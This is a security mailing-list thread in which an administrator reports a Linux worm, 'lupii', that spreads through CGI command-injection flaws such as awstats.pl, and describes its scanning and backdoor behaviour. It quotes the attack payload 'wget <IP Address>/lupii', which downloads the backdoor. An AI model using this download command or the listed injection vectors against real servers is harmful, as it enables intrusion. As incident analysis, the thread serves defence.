Update: Worm/Virus related to SID 3813: "WEB-CGI awstats.pl configdir command execution attempt" and other SIDs ?

[TPanaitescu () colorcon com]

Hi,

I couldn't help it and I ran the program, of course with a sniffer on. 
Syntax: lupii <IP_address_of_the_reporting_host> Here's what I found:
1. runs on RedHat Enterprise Workstation 4
2. opens up udp:7222
3. Exchanges some info with <IP_address_of_the_reporting_host> over udp 
7222
4. remains active in the background
5. starts a SYN scan to port 80 on random destinations, this particular 
example it used a class A address, keeping the first 2 octets unchanged 
and changing just the last 2 octets of the address, in order from X.Y.0.0 
to X.Y.z.w. 
6. it doesn't seem to be downloading anything from the Internet
7. It tries several ways to infect the scanned system, all are based on 
CGI command execution/code injection: awstats.pl, webhints, xml-rp for php 
etc. You can see all these if you look at the program code.

I stopped the program but I have the capture.

Any news from anybody else ?

Tudor


__________________

Hi again everyone,

Got the same thing few minutes ago, coming from China this time, pointing 
to the same address for the download .... Seems to be spreading ? The 
downloaded file is definitely for Linux.

Tudor

__________________

Hi everyone,

Last night I caught an attack to my web servers here, the attack consisted 
in command execution attempts using various CGI vulnerabilities. The fact 
is that after looking at the payload of all connection attempts, they all 
had a "wget <IP Address>/lupii", same IP address, I can send it to the 
list if anybody needs it. I downloaded the file from that site, it is an 
elf executable and it seems to be a backdoor of some sort reporting back 
to the site. The attack was coming from Taiwan and the download site was 
in Norway. 

I am not good at looking at elf format programs, is anybody willing to 
take a look ? I can send the file on demand. Does anybody know what is 
this all about ?

Thanks,
Tudor